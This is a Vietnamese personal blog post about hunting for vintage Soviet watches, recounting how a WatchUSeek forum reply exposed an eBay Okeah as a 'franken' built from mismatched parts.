Dĩ nhiên có những shop cam đoan bán hàng Legit đã có uy tín cả vài chục năm, mua đó thì bảo đảm, nhưng giá đắt hơn phải gấp rưỡi hay gấp đôi là ít. Tôi đành phải xem trên các nơi rao vặt hay bán hàng online như eBay. Sau khi kiếm được con mình thích là quá trình nghiên cứu xem liệu nó có phải hàng Legit không. Thường thì tôi tham khảo ở forum về đồng hồ Liên Xô trên WatchUSeek, các blog, hay vào từng trang web uy tín mà xem đồng hồ của họ và so sánh. Nếu vẫn còn nghi ngại, dù chỉ gợn chút thôi, là tôi phải gửi tin nhắn tới các tên tuổi có uy tín trên forum hay blog mà nhờ tư vấn.

Đây, ví dụ gần đây, tôi muốn mua một con được xem là The Holy Grail của nhiều người –Okeah. Okeah có 2 mẫu chính (không kể mẫu Homage gần đây làm lại) là ở thập niên 70 và 80. Tôi tìm được từ nhiều nguồn tin cậy đây là hình gốc của 2 con đồng hồ này

Đây là con năm thập niên 70

70

70b

Đây là con năm thập niên 80

80

80b

Nhìn 2 con này hoàn toàn giống nhau, ngoài vị trí con ốc này đây.

oc

Sau một thời gian  tìm hiểu, tôi tìm được một con trên eBay

Con này nhìn chi tiết trên mặt đồng hồ đều giống

dial-look-like

Ok, tôi nhìn sang máy

movement

Wow, phiên bản này là phiên bản không có con ốc, mọi chi tiết khác từ font chữ ở trên máy, các bánh răng bố trí ra sao… đều giống như trong hình gốc. Ấy thế mà tôi vẫn gờn gợn, tôi mới lên forum về đồng hồ Liên Xô hỏi, thì có tay trả lời

Cái này là franken. Mày nhìn vào mặt số, nó là mặt gốc nhưng đã được phủ lớp phản quang lại (mấy cái màu xanh lá phản quang trên mặt số nhìn mới hơn ở kim).

Well, cái này thì không sao. Nhưng đọc tiếp,

Cái nắp là chrome, trong khi OKEAH thật có nắp là thép không gỉ và thường được in hình trên đó.

Thế đấy, không cẩn thận là tôi mua phải hàng franken mà cứ hí hửng mình mua được một con Legit rồi.

Nhìn chung đồng hồ Liên Xô là tùy duyên, nhiều khi có duyên gặp được một con giá vừa túi tiền mà là hàng xịn, nhiều khi vô duyên kiếm mãi mà toàn ra giá trên trời hay hàng giả. Nói chung vất vả lắm mới kiếm được một con ưng ý. Thường ưng ý con nào tìm mấy tháng trời nhiều khi vẫn chưa ra. Nhưng khi cầm trên tay một con săn được, ngắm từng góc cạnh, từng đường uốn lượn của đồng hồ, nghe tiếng kim đồng hồ chạy… thấy như từng nhịp đập của lịch sử đang chạy trong tim mình. Cảm giác đó với tôi là thứ đam mê tuyệt vời nhất.

B.l.u.e

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.